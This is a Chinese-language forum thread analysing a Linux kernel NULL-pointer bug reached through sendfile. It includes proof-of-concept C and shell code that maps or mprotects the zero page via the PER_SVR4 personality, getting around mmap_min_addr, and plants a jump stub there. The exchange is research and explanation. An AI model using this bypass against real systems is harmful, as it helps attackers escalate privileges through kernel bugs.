剖析一个由sendfile引发的linux内核BUG

Godbach

原帖由 W.Z.T 于 2010-1-16 20:36 发表


标准内核是在2.6.26以后才被加进selinux里， redhat的系统不是标准内核， 估计他们打了相关的补丁。

哦，那就是了。我测试的三个RHEL环境中，有一个用的是安装的系统自带的内核，应该是RH打过补丁的。另外两个都是我自己编译的2.6.18.3的内核。就算开启了SElinux，应该也不会有这个变量。

T-Bagwell

原帖由 Godbach 于 2010-1-16 21:42 发表


对，默认安装和启动了SElinux，后来关闭的。

不过感觉我的几个环境有点区别，都是RHEL5.2，开始装的是都应该启动了SElinux，但是两个测试环境中都没有了mmap_min_addr文件

看看config文件里面是不是带了CONFIG_DEFAULT_MMAP_MIN_ADDR

Godbach

你安装的系统是默认安装和启动了selinux吧， 安装selinux就会在/proc目录下有mmap_min_addr文件。 关闭selinux之后这个还是应该存在的吧， 只是失效了而已。

WZT兄，我在我的测试环境中，默认用了RHEL5.2的内核，禁用了Selinux之后，重启系统，mmap_min_addr文件还存在，可以如你说的应该失效了。
执行getenforce得到的结果也是：Disabled。

然后执行exp的程序，就是那个run.sh，出错信息和我之前贴出的一样：

mprotect： Cannot allocated memory

也就是mprotect这个函数没有执行成功。

Godbach

原帖由 T-Bagwell 于 2010-1-16 22:00 发表

看看config文件里面是不是带了CONFIG_DEFAULT_MMAP_MIN_ADDR

没有带这个

T-Bagwell

1. 
   
2. 222 config DEFAULT_MMAP_MIN_ADDR
   
3. 223         int "Low address space to protect from user allocation"
   
4. 224     depends on MMU
   
5. 225         default 4096
   
6. 226         help
   
7. 227       This is the portion of low virtual memory which should be protected
   
8. 228       from userspace allocation.  Keeping a user from writing to low pages
   
9. 229       can help reduce the impact of kernel NULL pointer bugs.
   
10. 230
    
11. 231       For most ia64, ppc64 and x86 users with lots of address space
    
12. 232       a value of 65536 is reasonable and should cause no problems.
    
13. 233       On arm and other archs it should not be higher than 32768.
    
14. 234       Programs which use vm86 functionality or have some need to map
    
15. 235       this low address space will need CAP_SYS_RAWIO or disable this
    
16. 236       protection by setting the value to 0.
    
17. 237
    
18. 238       This value can be changed after boot using the
    
19. 239       /proc/sys/vm/mmap_min_addr tunable.
    
20. 
    

复制代码

会不会和这个有关系呢

W.Z.T

原帖由 Godbach 于 2010-1-16 22:15 发表

WZT兄，我在我的测试环境中，默认用了RHEL5.2的内核，禁用了Selinux之后，重启系统，mmap_min_addr文件还存在，可以如你说的应该失效了。
执行getenforce得到的结果也是：Disabled。

然后执行exp的程序， ...

我这没有as5.2的内核， 你可以再在自己build的2.6.18.3系统上测试下exp程序， 如果成功了， 说明as5.2的系统打了什么补丁禁止mprotect的修改了。 我猜测的


BTW: 我在as5.4下都能修改成功。

mmap.c

1. 
   
2. #include <stdio.h>
   
3. #include <stdlib.h>
   
4. #include <string.h>
   
5. #include <sys/personality.h>
   
6. #include <sys/mman.h>
   
7. #include <errno.h>
   
8. 
   
9. void test_code(void)
   
10. {
    
11.         printf("We are mmapped in zero memory!\n");
    
12. }
    
13. 
    
14. int mmap_zero_memory(void)
    
15. {
    
16.         void *mem;
    
17. 
    
18. 
    
19.         if ((personality(0xffffffff)) != PER_SVR4) {
    
20.                 mem = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE| PROT_EXEC,
    
21.                         MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    
22.                 if (mem == MAP_FAILED || mem != NULL) {
    
23.                         fprintf(stderr, "[+] Try fix mmap prot.\n");
    
24.                         mem = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE,
    
25.                                 MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    
26.                         if (mem == MAP_FAILED || mem != NULL) {
    
27.                                 fprintf(stderr,
    
28.                                         "[-] Unable mmap to zero memory.\n");
    
29.                                 return -1;
    
30.                         }
    
31.                 }
    
32.                 if (mem == NULL) {
    
33.                         fprintf(stderr, "[+] Mmap to zero memroy.\n");\
    
34.                 }
    
35.         }
    
36.         else {
    
37.                 if (mprotect(0x0, 0x10, PROT_READ | PROT_WRITE | PROT_EXEC)
    
38.                         == -1) {
    
39.                         perror("mprotect");
    
40.                         fprintf(stderr, "[-] Unable mmap to zero memory.\n");
    
41.                         return -1;
    
42.                 }
    
43.                 fprintf(stderr, "[+] Mprotect zero memroy success.\n");
    
44.         }
    
45. 
    
46.         *(char *)0 = '\x90';
    
47.         *(char *)1 = '\xe9';
    
48.         *(unsigned long *)2 = (unsigned long)&test_code - 6;
    
49. 
    
50.         return 0;
    
51. }
    
52. 
    
53. int main(void)
    
54. {
    
55.         mmap_zero_memory();
    
56. }
    

复制代码

run.c

1. 
   
2. #include <sys/personality.h>
   
3. #include <stdio.h>
   
4. #include <unistd.h>
   
5. 
   
6. int main(void) {
   
7.         if (personality(PER_SVR4) < 0) {
   
8.                 perror("personality");
   
9.                 return -1;
   
10.         }
    
11. 
    
12.         fprintf(stderr, "set personality PER_SVR4 successful.\n");
    
13. 
    
14.         execl("./mmap", "mmap", 0);
    
15. }
    

复制代码

run.sh

1. 
   
2. #!/bin/sh
   
3. 
   
4. gcc -o run run.c && \
   
5. gcc -o exploit exploit.c && \
   
6. ./run
   

复制代码

[ 本帖最后由 W.Z.T 于 2010-1-17 11:36 编辑 ]

Godbach

我这没有as5.2的内核， 你可以再在自己build的2.6.18.3系统上测试下exp程序， 如果成功了， 说明as5.2的系统打了什么补丁禁止mprotect的修改了。 我猜测的

多谢，应该是这个原因。我自己编译的内核版本用了2.6.18.3的，开不开启SElinux都可以exp的。

Godbach

231       For most ia64, ppc64 and x86 users with lots of address space
232       a value of 65536 is reasonable and should cause no problems.

嗯，装完RHEL 5.2，这个值默认就是65536

W.Z.T

原帖由 Godbach 于 2010-1-17 11:24 发表

嗯，装完RHEL 5.2，这个值默认就是65536

看我重新编辑过的帖子， 可以在 as5.4下修改0地址属性。 针对2.6.26以前的系统exploit有2个方案来映射0地址内存， 设置PER_SRV4后， 就可以用mrptect来修改0地址属性了， 因此跟selinux开不开都没啥关系了吧， 更跟mmap_min_addr这个东西有没有关系了吧。 另外 2.6.18的内核mrptect也是允许修改0地址属性的。

1. 
   
2. asmlinkage long
   
3. sys_mprotect(unsigned long start, size_t len, unsigned long prot)
   
4. {
   
5. ...
   
6.         else {
   
7.                 if (vma->vm_start > start)
   
8.                         goto out;
   

复制代码

设置完PER_SRV4后， 内核在加载elf文件的时候， 自动把0地址的空间映射到用户进程上了， 所以start是0的话， 是可以满足条件的。

[ 本帖最后由 W.Z.T 于 2010-1-17 11:59 编辑 ]

Godbach

多谢WZT兄的详细解释。这个应该印证了我用标准的2.6.18编译之后可以exp的原因。

另外，为什么那个程序还要分出来一个run.c呢。他也就是设置一下PER_SVR4。不可以合并到同一个文件里吗？